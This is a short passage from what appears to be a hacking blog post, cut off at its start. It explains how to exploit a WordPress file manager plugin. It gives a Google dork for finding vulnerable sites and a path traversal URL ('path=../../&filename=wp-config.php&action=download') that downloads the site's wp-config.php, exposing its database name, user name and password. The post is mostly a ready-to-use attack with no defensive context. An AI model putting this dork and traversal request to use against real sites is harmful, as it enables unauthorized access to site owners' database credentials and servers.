the wp-config.php file where you can find out the database name, user name and password for the Wordpress site.Google Dorks: inurl:wp-content/plugins/wp-filemanager/
Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
Only works if "Allow Download" setting is checked in the FileManager's settings on the server.
Original source here.
0 comments:
Post a Comment